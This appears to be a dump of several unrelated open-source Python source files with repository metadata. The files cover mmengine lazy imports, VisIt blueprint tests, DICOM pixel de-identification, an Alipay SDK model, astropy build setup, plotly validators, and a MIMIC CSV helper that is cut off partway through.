# LazyObject will return a `__getstate__` LazyObject` or `__setstate__`
# LazyObject.
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
self.__dict__ = state
class LazyAttr:
"""The attribute of the LazyObject.
When parsing the configuration file, the imported syntax will be
parsed as the assignment ``LazyObject``. During the subsequent parsing
process, users may reference the attributes of the LazyObject.
To ensure that these attributes also contain information needed to
reconstruct the attribute itself, LazyAttr was introduced.
Examples:
>>> models = LazyObject(['mmdet.models'])
>>> model = dict(type=models.RetinaNet)
>>> print(type(model['type'])) # <class 'mmengine.config.lazy.LazyAttr'>
>>> print(model['type'].build()) # <class 'mmdet.models.detectors.retinanet.RetinaNet'>
""" # noqa: E501
def __init__(self,
name: str,
source: Union['LazyObject', 'LazyAttr'],
location=None):
self.name = name
self.source: Union[LazyAttr, LazyObject] = source
if isinstance(self.source, LazyObject):
if isinstance(self.source._module, str):
if self.source._imported is None:
# source code:
# from xxx.yyy import zzz
# equivalent code:
# zzz = LazyObject('xxx.yyy', 'zzz')
# The source code of get attribute:
# eee = zzz.eee
# Then, `eee._module` should be "xxx.yyy.zzz"
self._module = self.source._module
else:
# source code:
# import xxx.yyy as zzz
# equivalent code:
# zzz = LazyObject('xxx.yyy')
# The source code of get attribute:
# eee = zzz.eee
# Then, `eee._module` should be "xxx.yyy"
self._module = f'{self.source._module}.{self.source}'
else:
# The source code of LazyObject should be
# 1. import xxx.yyy
# 2. import xxx.zzz
# Equivalent to
# xxx = LazyObject(['xxx.yyy', 'xxx.zzz'])
# The source code of LazyAttr should be
# eee = xxx.eee
# Then, eee._module = xxx
self._module = str(self.source)
elif isinstance(self.source, LazyAttr):
# 1. import xxx
# 2. zzz = xxx.yyy.zzz
# Equivalent to:
# xxx = LazyObject('xxx')
# zzz = xxx.yyy.zzz
# zzz._module = xxx.yyy._module + zzz.name
self._module = f'{self.source._module}.{self.source.name}'
self.location = location
@property
def module(self):
return self._module
def __call__(self, *args, **kwargs: Any) -> Any:
raise RuntimeError()
def __getattr__(self, name: str) -> 'LazyAttr':
return LazyAttr(name, self)
def __deepcopy__(self, memo):
return LazyAttr(self.name, self.source)
def build(self) -> Any:
"""Return the attribute of the imported object.
Returns:
Any: attribute of the imported object.
"""
obj = self.source.build()
try:
return getattr(obj, self.name)
except AttributeError:
raise ImportError(f'Failed to import {self.module}.{self.name} in '
f'{self.location}')
except ImportError as e:
raise e
def __str__(self) -> str:
return self.name
__repr__ = __str__
# `pickle.dump` will try to get the `__getstate__` and `__setstate__`
# methods of the dumped object. If these two methods are not defined,
# LazyAttr will return a `__getstate__` LazyAttr` or `__setstate__`
# LazyAttr.
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
self.__dict__ = state
|
462b8774fcacee71420781c2224134f45cfae488
|
03666e5f961946fc1a0ac67781ac1425562ef0d7
|
/src/test/tests/databases/blueprint_axom_klee.py
|
d50dc63ab57c0da565dc313a449615e08433cf33
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
visit-dav/visit
|
e9f81b4d4b9b9930a0db9d5282cd1bcabf465e2e
|
601ae46e0bef2e18425b482a755d03490ade0493
|
refs/heads/develop
| 2023-09-06T08:19:38.397058
| 2023-09-05T21:29:32
| 2023-09-05T21:29:32
| 165,565,988
| 335
| 120
|
BSD-3-Clause
| 2023-09-14T00:53:37
| 2019-01-13T23:27:26
|
C
|
UTF-8
|
Python
| false
| false
| 4,261
|
py
|
blueprint_axom_klee.py
|
# ----------------------------------------------------------------------------
# CLASSES: nightly
#
# Test Case: blueprint_axom_klee.py
#
# Tests: blueprint hdf5 files
#
# Programmer: Brad Whitlock
# Date: Wed May 31 15:59:22 PDT 2023
#
# Modifications:
#
# ----------------------------------------------------------------------------
RequiredDatabasePlugin("Blueprint")
from os.path import join as pjoin
def bj_test_helper(datadir, prefix, sectionText):
TestSection(sectionText)
db = data_path(pjoin("axom_klee_test_data", datadir, "shaping.root"))
OpenDatabase(db)
AddPlot("FilledBoundary", "shaping_mesh_material")
fb = FilledBoundaryAttributes(1)
fb.SetMultiColor(0, (255,0,0,255))
fb.SetMultiColor(1, (0,255,0,255))
fb.SetMultiColor(2, (0,0,255,255))
fb.SetMultiColor(3, (0,255,255,255))
SetPlotOptions(fb)
AddPlot("Mesh", "shaping_mesh")
DrawPlots()
v = GetView2D()
v.windowCoords = (7.83773, 12.304, 8.64959, 13.1412)
v.viewportCoords = (0.2, 0.95, 0.15, 0.95)
SetView2D(v)
SetActivePlots((0,1))
Test(prefix + "_00")
# Increase the resolution.
AddOperator("MultiresControl", 1)
m = MultiresControlAttributes()
m.resolution = 4
m.maxResolution = 10
SetOperatorOptions(m)
DrawPlots()
Test(prefix + "_01")
v2 = GetView2D()
v2.windowCoords = (9.50025, 10.5163, 10.8769, 11.9097)
v2.viewportCoords = (0.2, 0.95, 0.15, 0.95)
SetView2D(v2)
Test(prefix + "_02")
# Look at one of the volume fractions. It should be refined
SetActivePlots(0)
DeleteActivePlots()
AddPlot("Pseudocolor", "shaping_mesh/vol_frac_steel", 1, 1)
DrawPlots()
SetView2D(v)
Test(prefix + "_03")
DeleteAllPlots()
CloseDatabase(db)
def test0():
TestSection("P0 Material")
db = data_path(pjoin("axom_klee_test_data", "heroic_roses_o0", "shaping.root"))
OpenDatabase(db)
AddPlot("FilledBoundary", "shaping_mesh_material")
fb = FilledBoundaryAttributes(1)
fb.SetMultiColor(0, (0,0,0,255))
fb.SetMultiColor(1, (80,80,220,255))
fb.SetMultiColor(2, (93,241,160,255))
fb.SetMultiColor(3, (0,120,0,255))
fb.SetMultiColor(4, (90,100,50,255))
fb.SetMultiColor(5, (241,132,171,255))
fb.SetMultiColor(6, (184,158,241,255))
fb.SetMultiColor(7, (240,0,0,255))
fb.SetMultiColor(8, (255,153,0,255))
SetPlotOptions(fb)
DrawPlots()
ResetView()
Test("blueprint_axom_klee_0_00")
DeleteAllPlots()
CloseDatabase(db)
def test1():
bj_test_helper("balls_and_jacks_q7o2", "blueprint_axom_klee_1", "P2 Material")
def test2():
bj_test_helper("balls_and_jacks_q7o5", "blueprint_axom_klee_2", "P5 Material")
def test3():
TestSection("matvf on HO materials")
db = data_path(pjoin("axom_klee_test_data", "3mat_q12o12", "shaping.root"))
OpenDatabase(db)
AddPlot("FilledBoundary", "shaping_mesh_material")
AddOperator("MultiresControl")
op = MultiresControlAttributes()
op.resolution = 16
SetOperatorOptions(op)
DrawPlots()
ResetView()
Test("blueprint_axom_klee_3_00")
DeleteAllPlots()
DefineScalarExpression("vf_inner", 'matvf(shaping_mesh_material, "inner")')
DefineScalarExpression("vf_middle", 'matvf(shaping_mesh_material, "middle")')
DefineScalarExpression("vf_outer", 'matvf(shaping_mesh_material, "outer")')
AddPlot("Pseudocolor", "vf_inner")
AddOperator("MultiresControl")
op = MultiresControlAttributes()
op.resolution = 3
op.maxResolution = 20
SetOperatorOptions(op)
DrawPlots()
Test("blueprint_axom_klee_3_01")
op.resolution = 20
SetOperatorOptions(op)
Test("blueprint_axom_klee_3_02")
ChangeActivePlotsVar("vf_middle")
op.resolution = 3
SetOperatorOptions(op)
Test("blueprint_axom_klee_3_03")
op.resolution = 20
SetOperatorOptions(op)
Test("blueprint_axom_klee_3_04")
ChangeActivePlotsVar("vf_outer")
op.resolution = 3
SetOperatorOptions(op)
Test("blueprint_axom_klee_3_05")
op.resolution = 20
SetOperatorOptions(op)
Test("blueprint_axom_klee_3_06")
DeleteAllPlots()
CloseDatabase(db)
def main():
test0()
test1()
test2()
test3()
main()
Exit()
|
2abba51d0c2adf91b5a5157aa6b8de48c443eb23
|
4b609f6c89b1e2c3ac43f0864f6b602396da9d22
|
/deid/dicom/pixels/clean.py
|
a65623793e0aeabcde6859ef1c2c698af94dea61
|
[
"MIT"
] |
permissive
|
pydicom/deid
|
e1a597ce95d25e12e35ec9623d904d6c57e49bb4
|
40dc96125daeb65856d643e12c3d6dfec756be0d
|
refs/heads/master
| 2023-07-02T08:29:14.299457
| 2023-05-10T17:01:11
| 2023-05-10T17:01:11
| 94,163,984
| 120
| 52
|
MIT
| 2023-09-11T22:32:00
| 2017-06-13T03:16:10
|
Python
|
UTF-8
|
Python
| false
| false
| 15,394
|
py
|
clean.py
|
__author__ = "Vanessa Sochat"
__copyright__ = "Copyright 2016-2023, Vanessa Sochat"
__license__ = "MIT"
import math
import os
import random
import re
import sys
from typing import Optional
import matplotlib
import numpy
from numpy.typing import NDArray
from pydicom import read_file
from pydicom.pixel_data_handlers.util import get_expected_length
from deid.config import DeidRecipe
from deid.dicom import utils
from deid.logger import bot
from deid.utils import get_temporary_name
matplotlib.use("pdf")
from matplotlib import pyplot as plt # noqa
bot.level = 3
class DicomCleaner:
"""
Clean a dicom file of burned pixels.
take an input dicom file, check for burned pixels, and then clean,
with option to save / output in multiple formats. This object should
map to one dicom file, and the usage flow is the following:
cleaner = DicomCleaner()
summary = cleaner.detect(dicom_file)
cleaner.clean()
"""
def __init__(
self,
output_folder=None,
add_padding=False,
margin=3,
deid=None,
font=None,
force=True,
):
if output_folder is None:
output_folder = get_temporary_name(prefix="clean")
if font is None:
font = self.default_font()
self.font = font
self.cmap = "gray"
self.output_folder = output_folder
self.recipe = DeidRecipe(deid)
self.results = None
self.force = force
self.dicom_file: Optional[str] = None
self.cleaned: Optional[NDArray] = None
def default_font(self):
"""
Get the default font to use for a title.
define the font style for saving png figures
if a title is provided
"""
return {"family": "serif", "color": "darkred", "weight": "normal", "size": 16}
def detect(self, dicom_file):
"""
Initiate the cleaner for a new dicom file.
"""
from deid.dicom.pixels.detect import has_burned_pixels
self.results = has_burned_pixels(
dicom_file, deid=self.recipe.deid, force=self.force
)
self.dicom_file = dicom_file
return self.results
def clean(
self, fix_interpretation: bool = True, pixel_data_attribute: str = "PixelData"
) -> Optional[NDArray]:
if not self.results:
bot.warning(
"Use %s.detect() with a dicom file to find coordinates first." % self
)
return
bot.info("Scrubbing %s." % self.dicom_file)
self.cleaned = clean_pixel_data(
dicom_file=self.dicom_file,
results=self.results,
fix_interpretation=fix_interpretation,
pixel_data_attribute=pixel_data_attribute,
)
return self.cleaned
def get_figure(self, show=False, image_type="cleaned", title=None):
"""
Get a figure for an original or cleaned image.
If the image was already clean, it is simply a copy of the original.
If show is True, plot the image. If a 4d image is discovered, we use
randomly choose a slice.
"""
if hasattr(self, image_type):
_, ax = plt.subplots(figsize=(10, 6))
# Retrieve full image
image = getattr(self, image_type)
# Handle 4d data by choosing one dimension
if len(image.shape) == 4:
channel = random.choice(range(image.shape[3]))
bot.warning(
"Image detected as 4d, will sample channel %s and middle slice"
% channel
)
image = image[math.floor(image.shape[0] / 2), :, :, channel]
ax.imshow(image, cmap=self.cmap)
if title is not None:
plt.title(title, fontdict=self.font)
if show is True:
plt.show()
return plt
def _get_clean_name(self, output_folder, extension="dcm"):
"""
Get path to a cleaned output file.
Return a full path to an output file, with custom folder and
extension. If the output folder isn't yet created, make it.
Parameters
==========
output_folder: the output folder to create, will be created if doesn't
exist.
extension: the extension of the file to create a name for, should
not start with "."
"""
if output_folder is None:
output_folder = self.output_folder
if not os.path.exists(output_folder):
bot.debug("Creating output folder %s" % output_folder)
os.makedirs(output_folder)
basename = re.sub("[.]dicom|[.]dcm", "", os.path.basename(self.dicom_file))
return "%s/cleaned-%s.%s" % (output_folder, basename, extension)
def save_png(self, output_folder=None, image_type="cleaned", title=None):
"""
Save an original or cleaned dicom as png to disk.
Default image_format is "cleaned" and can be set to "original." If the
image was already clean (not flagged) the cleaned image is just a
copy of original. If a 4d image is provided, we save the dimension
specified (or if not provided, a randomly chosen dimension).
"""
if hasattr(self, image_type):
png_file = self._get_clean_name(output_folder, "png")
plt = self.get_figure(image_type=image_type, title=title)
plt.savefig(png_file)
plt.close()
return png_file
else:
bot.warning("use detect() --> clean() before saving is possible.")
def save_animation(self, output_folder=None, image_type="cleaned", title=None):
"""
Save an original or cleaned animation of a dicom.
If there are not enough frames, then save_png should be used instead.
"""
if hasattr(self, image_type):
from matplotlib import animation
animation.rcParams["animation.writer"] = "ffmpeg"
image = getattr(self, image_type)
# If we have rgb, choose a channel
if len(image.shape) == 4:
channel = random.choice(range(image.shape[3]))
bot.warning("Selecting channel %s for rendering" % channel)
image = image[:, :, :, channel]
# Now we expect 3D, we can animate one dimension over time
if len(image.shape) == 3:
movie_file = self._get_clean_name(output_folder, "mp4")
# First set up the figure, the axis, and the plot element we want to animate
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(10, 6))
plt.close()
ax.xlim = (0, image.shape[1])
ax.ylim = (0, image.shape[2])
ax.set_xticks([])
ax.set_yticks([])
img = ax.imshow(image[0, :, :].T, cmap="gray")
img.set_interpolation("nearest")
# The animation function should take an index i
def animate(i):
img.set_data(image[i, :, :].T)
sys.stdout.flush()
return (img,)
bot.info("Generating animation...")
anim = animation.FuncAnimation(
fig, animate, frames=image.shape[0], interval=50, blit=True
)
anim.save(
movie_file,
writer="ffmpeg",
fps=10,
dpi=100,
metadata={"title": title or "deid-animation"},
)
return movie_file
else:
bot.warning(
"save_animation() is only for 4D data. Use save_png instead."
)
else:
bot.warning("use detect() --> clean() before saving is possible.")
def save_dicom(self, output_folder=None, image_type="cleaned"):
"""
Save a cleaned dicom to disk.
We expose an option to save an original (change image_type to "original"
to be consistent, although this is not incredibly useful given it would
duplicate the original data.
"""
# Having clean also means has dicom image
if hasattr(self, image_type):
dicom_name = self._get_clean_name(output_folder)
dicom = read_file(self.dicom_file, force=True)
# If going from compressed, change TransferSyntax
if dicom.file_meta.TransferSyntaxUID.is_compressed is True:
dicom.decompress()
dicom.PixelData = self.cleaned.tobytes()
dicom.save_as(dicom_name)
return dicom_name
else:
bot.warning("use detect() --> clean() before saving is possible.")
def clean_pixel_data(
dicom_file,
results: dict,
fix_interpretation: bool = True,
pixel_data_attribute: str = "PixelData",
):
"""
Clean a dicom file.
take a dicom image and a list of pixel coordinates, and return
a cleaned file (if output file is specified) or simply plot
the cleaned result (if no file is specified)
Parameters
==========
dicom_file: (str or FileDataset instance) Dicom file to clean
results: Result of the .has_burned_pixels() method
fix_interpretation: fix the photometric interpretation if found off
pixel_data_attribute: PixelData attribute name in the dicom file
"""
cleaned = None
# Load in dicom file, and image data
dicom = utils.load_dicom(dicom_file)
pixel_data = getattr(dicom, pixel_data_attribute)
# Get expected and actual length of the pixel data (bytes, expected does not include trailing null byte)
expected_length = get_expected_length(dicom)
actual_length = len(pixel_data)
full_length = expected_length / 2 * 3 # upsampled data is a third larger
full_length += 1 if full_length % 2 else 0 # trailing padding byte if even length
# If we have YBR_FULL_2, must be RGB to obtain pixel data
if (
not dicom.file_meta.TransferSyntaxUID.is_compressed
and dicom.PhotometricInterpretation == "YBR_FULL_422"
and fix_interpretation
and actual_length >= full_length
):
bot.warning(
"Updating dicom.PhotometricInterpretation to RGB, set fix_interpretation to False to skip."
)
photometric_original = dicom.PhotometricInterpretation
dicom.PhotometricInterpretation = "RGB"
original = dicom.pixel_array
dicom.PhotometricInterpretation = photometric_original
else:
original = dicom.pixel_array
# Compile coordinates from result, generate list of tuples with coordinate and value
# keepcoordinates == 1 (included in mask) and coordinates == 0 (remove).
coordinates = []
for item in results["results"]:
# We iterate through coordinates in order specified in file
for coordinate_set in item.get("coordinates", []):
# Each is a list with [value, coordinate]
mask_value, new_coordinates = coordinate_set
if not isinstance(new_coordinates, list):
new_coordinates = [new_coordinates]
for new_coordinate in new_coordinates:
# Case 1: an "all" indicates applying to entire image
if new_coordinate.lower() == "all":
# 2D - Greyscale Image - Shape = (X, Y) OR 3D - RGB Image - Shape = (X, Y, Channel)
if len(original.shape) == 2 or (
len(original.shape) == 3 and dicom.SamplesPerPixel == 3
):
# minr, minc, maxr, maxc = [0, 0, Y, X]
new_coordinate = [
0,
0,
original.shape[1],
original.shape[0],
]
# 4D - RGB Cine Clip - Shape = (frames, X, Y, channel) OR 3D - Greyscale Cine Clip - Shape = (frames, X, Y)
if len(original.shape) == 4 or (
len(original.shape) == 3 and dicom.SamplesPerPixel == 1
):
new_coordinate = [
0,
0,
original.shape[2],
original.shape[1],
]
else:
new_coordinate = [int(x) for x in new_coordinate.split(",")]
coordinates.append(
(mask_value, new_coordinate)
) # [(1, [1,2,3,4]),...(0, [1,2,3,4])]
# Instead of writing directly to data, create a mask of 1s (start keeping all)
# For 4D RGB Cine - (frames, X, Y, channel) or 3D Greyscale Cine - (frames, X, Y)
if len(original.shape) == 4 or (
len(original.shape) == 3 and dicom.SamplesPerPixel == 1
):
mask = numpy.ones(original.shape[1:3], dtype=numpy.uint8)
# For 2D Greyscale image (X, Y) or 3D RGB Image (X, Y channel)
else:
mask = numpy.ones(original.shape[0:2], dtype=numpy.uint8)
# Here we apply the coordinates to the mask, 1==keep, 0==clean
for coordinate_value, coordinate in coordinates:
minr, minc, maxr, maxc = coordinate
# Update the mask: values set to 0 to be black
mask[minc:maxc, minr:maxr] = coordinate_value
# Now apply finished mask to the data
# RGB cine clip
if len(original.shape) == 4:
# np.tile does the copying and stacking of masks into the channel dim to produce 3D masks
# transposition to convert tile output (channel, X, Y) into (X, Y, channel)
# see: https://github.com/nquach/anonymize/blob/master/anonymize.py#L154
channel3mask = numpy.transpose(numpy.tile(mask, (3, 1, 1)), (1, 2, 0))
# use numpy.tile to copy and stack the 3D masks into 4D array to apply to 4D pixel data
# tile converts (X, Y, channels) -> (frames, X, Y, channels), presumed ordering for 4D pixel data
final_mask = numpy.tile(channel3mask, (original.shape[0], 1, 1, 1))
# apply final 4D mask to 4D pixel data
cleaned = final_mask * original
# RGB image or Greyscale cine clip
elif len(original.shape) == 3:
# This condition is ambiguous. If the image shape is 3, we may have a single frame RGB image: size (X, Y, channel)
# or a multiframe greyscale image: size (frames, X, Y). Interrogate the SamplesPerPixel field.
if dicom.SamplesPerPixel == 3:
# RGB Image
# Convert (X, Y) -> (X, Y, channel)
final_mask = numpy.transpose(
numpy.tile(mask, (original.shape[2], 1, 1)), (1, 2, 0)
)
else:
# Greyscale cine clip
# Convert (X, Y) -> (frames, X, Y)
final_mask = numpy.tile(mask, (original.shape[0], 1, 1))
# apply final 3D mask to 3D pixel data
cleaned = final_mask * original
# greyscale image: no need to stack into the channel dim since it doesn't exist
elif len(original.shape) == 2:
cleaned = mask * original
else:
bot.warning(
"Pixel array dimension %s is not recognized." % (str(original.shape))
)
return cleaned
|
b7dfc743668027b8d87dab6a8d77b83f0c4e9ae3
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AlipayOpenIotmbsIsvhotelCreateModel.py
|
0789f8baf1ab18f75422dc1ba350cfd9fff12900
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 4,345
|
py
|
AlipayOpenIotmbsIsvhotelCreateModel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayOpenIotmbsIsvhotelCreateModel(object):
def __init__(self):
self._appid = None
self._area_code = None
self._project_addr = None
self._project_flag = None
self._project_id = None
self._project_name = None
self._shop_id = None
self._solution = None
@property
def appid(self):
return self._appid
@appid.setter
def appid(self, value):
self._appid = value
@property
def area_code(self):
return self._area_code
@area_code.setter
def area_code(self, value):
self._area_code = value
@property
def project_addr(self):
return self._project_addr
@project_addr.setter
def project_addr(self, value):
self._project_addr = value
@property
def project_flag(self):
return self._project_flag
@project_flag.setter
def project_flag(self, value):
self._project_flag = value
@property
def project_id(self):
return self._project_id
@project_id.setter
def project_id(self, value):
self._project_id = value
@property
def project_name(self):
return self._project_name
@project_name.setter
def project_name(self, value):
self._project_name = value
@property
def shop_id(self):
return self._shop_id
@shop_id.setter
def shop_id(self, value):
self._shop_id = value
@property
def solution(self):
return self._solution
@solution.setter
def solution(self, value):
self._solution = value
def to_alipay_dict(self):
params = dict()
if self.appid:
if hasattr(self.appid, 'to_alipay_dict'):
params['appid'] = self.appid.to_alipay_dict()
else:
params['appid'] = self.appid
if self.area_code:
if hasattr(self.area_code, 'to_alipay_dict'):
params['area_code'] = self.area_code.to_alipay_dict()
else:
params['area_code'] = self.area_code
if self.project_addr:
if hasattr(self.project_addr, 'to_alipay_dict'):
params['project_addr'] = self.project_addr.to_alipay_dict()
else:
params['project_addr'] = self.project_addr
if self.project_flag:
if hasattr(self.project_flag, 'to_alipay_dict'):
params['project_flag'] = self.project_flag.to_alipay_dict()
else:
params['project_flag'] = self.project_flag
if self.project_id:
if hasattr(self.project_id, 'to_alipay_dict'):
params['project_id'] = self.project_id.to_alipay_dict()
else:
params['project_id'] = self.project_id
if self.project_name:
if hasattr(self.project_name, 'to_alipay_dict'):
params['project_name'] = self.project_name.to_alipay_dict()
else:
params['project_name'] = self.project_name
if self.shop_id:
if hasattr(self.shop_id, 'to_alipay_dict'):
params['shop_id'] = self.shop_id.to_alipay_dict()
else:
params['shop_id'] = self.shop_id
if self.solution:
if hasattr(self.solution, 'to_alipay_dict'):
params['solution'] = self.solution.to_alipay_dict()
else:
params['solution'] = self.solution
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayOpenIotmbsIsvhotelCreateModel()
if 'appid' in d:
o.appid = d['appid']
if 'area_code' in d:
o.area_code = d['area_code']
if 'project_addr' in d:
o.project_addr = d['project_addr']
if 'project_flag' in d:
o.project_flag = d['project_flag']
if 'project_id' in d:
o.project_id = d['project_id']
if 'project_name' in d:
o.project_name = d['project_name']
if 'shop_id' in d:
o.shop_id = d['shop_id']
if 'solution' in d:
o.solution = d['solution']
return o
|
f2c7a1dfacde55afe52a3d868cf4abab13dec3b1
|
93713f46f16f1e29b725f263da164fed24ebf8a8
|
/Library/lib/python3.7/site-packages/astropy-4.0-py3.7-macosx-10.9-x86_64.egg/astropy/modeling/setup_package.py
|
138fde4d44bc46936c24d14cd26c81d55cab1641
|
[
"BSD-3-Clause"
] |
permissive
|
holzschu/Carnets
|
b83d15136d25db640cea023abb5c280b26a9620e
|
1ad7ec05fb1e3676ac879585296c513c3ee50ef9
|
refs/heads/master
| 2023-02-20T12:05:14.980685
| 2023-02-13T15:59:23
| 2023-02-13T15:59:23
| 167,671,526
| 541
| 36
|
BSD-3-Clause
| 2022-11-29T03:08:22
| 2019-01-26T09:26:46
|
Python
|
UTF-8
|
Python
| false
| false
| 4,319
|
py
|
setup_package.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import os
from os.path import join
from distutils.core import Extension
from distutils import log
from astropy_helpers import setup_helpers, utils
from astropy_helpers.version_helpers import get_pkg_version_module
wcs_setup_package = utils.import_file(join('astropy', 'wcs', 'setup_package.py'))
MODELING_ROOT = os.path.relpath(os.path.dirname(__file__))
MODELING_SRC = join(MODELING_ROOT, 'src')
SRC_FILES = [join(MODELING_SRC, 'projections.c.templ'),
__file__]
GEN_FILES = [join(MODELING_SRC, 'projections.c')]
# This defines the set of projection functions that we want to wrap.
# The key is the projection name, and the value is the number of
# parameters.
# (These are in the order that the appear in the WCS coordinate
# systems paper).
projections = {
'azp': 2,
'szp': 3,
'tan': 0,
'stg': 0,
'sin': 2,
'arc': 0,
'zea': 0,
'air': 1,
'cyp': 2,
'cea': 1,
'mer': 0,
'sfl': 0,
'par': 0,
'mol': 0,
'ait': 0,
'cop': 2,
'coe': 2,
'cod': 2,
'coo': 2,
'bon': 1,
'pco': 0,
'tsc': 0,
'csc': 0,
'qsc': 0,
'hpx': 2,
'xph': 0,
}
def pre_build_py_hook(cmd_obj):
preprocess_source()
def pre_build_ext_hook(cmd_obj):
preprocess_source()
def pre_sdist_hook(cmd_obj):
preprocess_source()
def preprocess_source():
# TODO: Move this to setup_helpers
# Generating the wcslib wrappers should only be done if needed. This also
# ensures that it is not done for any release tarball since those will
# include core.py and core.c.
if all(os.path.exists(filename) for filename in GEN_FILES):
# Determine modification times
src_mtime = max(os.path.getmtime(filename) for filename in SRC_FILES)
gen_mtime = min(os.path.getmtime(filename) for filename in GEN_FILES)
version = get_pkg_version_module('astropy')
if gen_mtime > src_mtime:
# If generated source is recent enough, don't update
return
elif version.release:
# or, if we're on a release, issue a warning, but go ahead and use
# the wrappers anyway
log.warn('WARNING: The autogenerated wrappers in '
'astropy.modeling._projections seem to be older '
'than the source templates used to create '
'them. Because this is a release version we will '
'use them anyway, but this might be a sign of '
'some sort of version mismatch or other '
'tampering. Or it might just mean you moved '
'some files around or otherwise accidentally '
'changed timestamps.')
return
# otherwise rebuild the autogenerated files
# If jinja2 isn't present, then print a warning and use existing files
try:
import jinja2 # pylint: disable=W0611
except ImportError:
log.warn("WARNING: jinja2 could not be imported, so the existing "
"modeling _projections.c file will be used")
return
from jinja2 import Environment, FileSystemLoader
# Prepare the jinja2 templating environment
env = Environment(loader=FileSystemLoader(MODELING_SRC))
c_in = env.get_template('projections.c.templ')
c_out = c_in.render(projections=projections)
with open(join(MODELING_SRC, 'projections.c'), 'w') as fd:
fd.write(c_out)
def get_extensions():
wcslib_files = [ # List of wcslib files to compile
'prj.c',
'wcserr.c',
'wcsprintf.c',
'wcsutil.c'
]
wcslib_config_paths = [
join(MODELING_SRC, 'wcsconfig.h')
]
cfg = setup_helpers.DistutilsExtensionArgs()
wcs_setup_package.get_wcslib_cfg(cfg, wcslib_files, wcslib_config_paths)
cfg['include_dirs'].append(MODELING_SRC)
astropy_files = [ # List of astropy.modeling files to compile
'projections.c'
]
cfg['sources'].extend(join(MODELING_SRC, x) for x in astropy_files)
cfg['sources'] = [str(x) for x in cfg['sources']]
cfg = dict((str(key), val) for key, val in cfg.items())
return [Extension('astropy.modeling._projections', **cfg)]
|
aa64ccb3b2100a5def39431e551b52a785debc47
|
acf7457d3a799cb9bff12686d2d616688bcd4b5b
|
/packages/python/plotly/plotly/validators/layout/uniformtext/__init__.py
|
8ddff597fe33c9ee20b9950c1e118dcad606507d
|
[
"MIT"
] |
permissive
|
plotly/plotly.py
|
f4f61639f08160f16195efc95b5901dc5a937346
|
975a704074f01c078e0fdfa32bdf17130bf89e69
|
refs/heads/master
| 2023-09-06T06:15:08.340035
| 2023-08-24T12:28:14
| 2023-08-24T12:28:14
| 14,579,099
| 14,751
| 2,989
|
MIT
| 2023-09-08T19:55:32
| 2013-11-21T05:53:08
|
Python
|
UTF-8
|
Python
| false
| false
| 371
|
py
|
__init__.py
|
import sys
from typing import TYPE_CHECKING
if sys.version_info < (3, 7) or TYPE_CHECKING:
from ._mode import ModeValidator
from ._minsize import MinsizeValidator
else:
from _plotly_utils.importers import relative_import
__all__, __getattr__, __dir__ = relative_import(
__name__, [], ["._mode.ModeValidator", "._minsize.MinsizeValidator"]
)
|
bc41d823eb354d47f1bb159f126f372ebff0df75
|
eaaaf5afe1bf933b2c00c84d862082995e6051ae
|
/mimic-iii/buildmimic/oracle/add_oracle_rowdelimiter.py
|
39f85294e065786ad2bbdf6bf0db3fa43a7ed6a8
|
[
"MIT"
] |
permissive
|
MIT-LCP/mimic-code
|
bca9846a9c0843289db677a2af00b43841950b48
|
78f7b6e5a8886f52066b0505c451597590bea862
|
refs/heads/main
| 2023-08-21T23:20:38.270790
| 2023-07-19T11:43:01
| 2023-07-19T11:43:01
| 41,767,943
| 2,208
| 1,579
|
MIT
| 2023-09-12T17:14:04
| 2015-09-01T23:03:51
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,539
|
py
|
add_oracle_rowdelimiter.py
|
from __future__ import print_function
import sys
import getopt
import os.path
import csv
# This function takes a CSV file and appends a string to the end of each row
# This facilitates using the CSV with programs which can't handle newlines in fields
# For example, Oracle's SQLLDR requires a unique string at the end of each row to indicate the row delimiter.
# FUNCTION ASSUMPTIONS:
# 1) file is in proper CSV format, where "proper" is defined as:
# comma delimited
# if a string contains a comma, it is double quoted
# if a string contains a newline, it is double quoted
# double quotes occurring within a string are escaped by another double quote
# 2) file does *not* have a header row
def main(argv):
"""
Run `Remove newlines` from a CSV file.
Arguments
----------
-h: print help
-i: str
Absolute path to a valid CSV file.
-d: str
Delimiter (','). For delimiters with special characters, quote the delimiter in apostrophes.
"""
# parse input arguments
fn_in=''
delimiter=''
fn_sql=''
output_type = 'oracle'
newline_char = '\n'
oracle_newrow = '><><?~`;;`'
# 'oracle' - delete newlines, replace with spaces.
try:
opts, args = getopt.getopt(argv,"hi:d:c:o",["ifile=","delimiter=","ctl="])
except getopt.GetoptError:
print('remove_newlines.py -i <input_file> -d <delimiter> -r <row_delimiter>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('remove_newlines.py -i <input_file> -d <delimiter> -r <row_delimiter>')
sys.exit()
elif opt in ("-i", "--ifile"):
fn_in = arg
elif opt in ("-d", "--delimiter"):
delimiter = arg
elif opt in ("-r", "--row-delimiter"):
oracle_newrow = arg
# input argument checking
if os.path.isfile(fn_in) == 1:
print('Using input file {}'.format(fn_in))
else:
print('Cannot find input file {}'.format(fn_in))
sys.exit(2)
fn_out=fn_in.strip('.csv')+'_output.csv'
print('\n'+'~'*40)
print('Input filename = {}'.format(fn_in))
print('Delimiter = {}'.format(delimiter))
print('New row character(s) = {}'.format(oracle_newrow))
print('Output filename = {}'.format(fn_out))
print('Please note all output fields will be double quoted.')
print('~'*40+'\n')
#raw_input('Press any key to continue.')
with open(fn_in , 'rb') as input_file:
reader = csv.reader(input_file, delimiter=',',
doublequote=True,
quoting=csv.QUOTE_MINIMAL)
